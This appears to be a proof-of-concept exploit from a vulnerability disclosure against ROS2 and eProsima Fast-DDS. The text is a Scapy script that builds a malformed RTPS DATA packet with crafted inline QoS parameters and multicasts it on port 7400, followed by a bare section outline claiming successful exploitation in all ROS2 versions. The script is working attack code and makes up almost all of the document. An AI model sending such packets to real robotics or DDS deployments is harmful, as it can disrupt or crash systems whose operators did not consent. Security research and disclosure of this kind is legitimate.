from scapy.all import *
from scapy.contrib.rtps import *
hostId = 0xdaf710ce
appId = 0xd9774bc6
instanceId = 0xd4359e60
entityId = 0x00001c1
class PacketSENTINEL(PIDPacketBase):
name = "PID_SENTINEL"
fields_desc = [
EField(XIntField("parameter_id", 0x0001), endianness=FORMAT_LE),
]
class participantId(EPacket):
name = "participantId"
fields_desc = [
XIntField("hostId", hostId),
XIntField("appId", appId),
XIntField("instanceId", instanceId),
XIntField("entity", entityId),
]
class UnknownPacket(EPacket):
name = "Unknown"
fields_desc = [
EField(ShortField("parameter_id", 0x800f), endianness=FORMAT_LE),
EField(ShortField("parameter_length", 0x0018), endianness=FORMAT_LE),
PacketListField("participantId", [participantId()], participantId),
XIntField("parameter1",0x00000000),
XIntField("parameter2",0x01000000),
]
class KeyHashPacket(EPacket):
name = "Data Packet"
fields_desc = [
EField(ShortField("parameter_id", 0x0070), endianness=FORMAT_LE),
EField(ShortField("parameter_length", 0x0010), endianness=FORMAT_LE),
PacketListField("participantId", [participantId()], participantId),
]
class StatusPacket(EPacket):
name = "status info"
fields_desc = [
EField(ShortField("parameter_id", 0x0071), endianness=FORMAT_LE),
EField(ShortField("parameter_length", 0x0004), endianness=FORMAT_LE),
XIntField("flags", 0x00000003),
]
class InlineQoSPacket(EPacket):
name = "Inline QoS"
fields_desc = [
PacketField("UnknownPacket", UnknownPacket(), UnknownPacket),
PacketField("KeyHashPacket", KeyHashPacket(), KeyHashPacket),
PacketField("StatusPacket", StatusPacket(), StatusPacket),
PacketField("sentinel", PacketSENTINEL(), PacketSENTINEL),
]
class RTPS(Packet):
name = "RTPS Header"
fields_desc = [
XIntField("magic", 0x52545053), # RTPS in hex
XByteField("major", 2),
XByteField("minor", 3),
XShortField("vendor_id", 0x010f),
XIntField("hostId", hostId),
XIntField("appId", appId),
XIntField("instanceId", instanceId),
]
class RTPSSubMessage_DATA(EPacket):
name = "RTPS DATA"
fields_desc = [
XByteField("submessageId", 0x15), # DATA
XByteField("flags", 0x03), # Data present, Endianness bit
ShortField("octetsToNextHeader", 0x5000),
XNBytesField("extraFlags", 0x0000, 2),
EField(ShortField("octetsToInlineQoS", 0x1000), endianness_from=e_flags),
X3BytesField("readerEntityIdKey", 0x000100),
XByteField("readerEntityIdKind", 0xc7), # Application-defined unknown kind
X3BytesField("writerEntityIdKey", 0x000100),
XByteField("writerEntityIdKind", 0xc2), # Built-in writer (with key)
EField(IntField("writerSeqNumHi", 0x00000000), endianness_from=e_flags),
EField(IntField("writerSeqNumLow", 0x02000000), endianness_from=e_flags),
PacketField("inline_qos", InlineQoSPacket(), InlineQoSPacket),
]
packet = Ether() / \
IP(src="192.168.177.151",dst="239.255.0.1") / \
UDP(sport=37005,dport=7400) / RTPS() / RTPSSubMessage_DATA()
sendp(packet, iface="ens33")
1. Summary
2. Details
Subscriber Function Analysis
1. ROS2 IRON Source Code Build
2. Uftrace
Analysis Code
Analysis Packet
3. PoC
Attack Environment Required Info
Successful exploitation in all ROS2 versions
4. Impact
4.1. Affected Version
Commint Analysis
eProsima/Fast-DDS/tree/2.10.x/src/cpp/rtps/security/SecurityManager.cpp:117, 793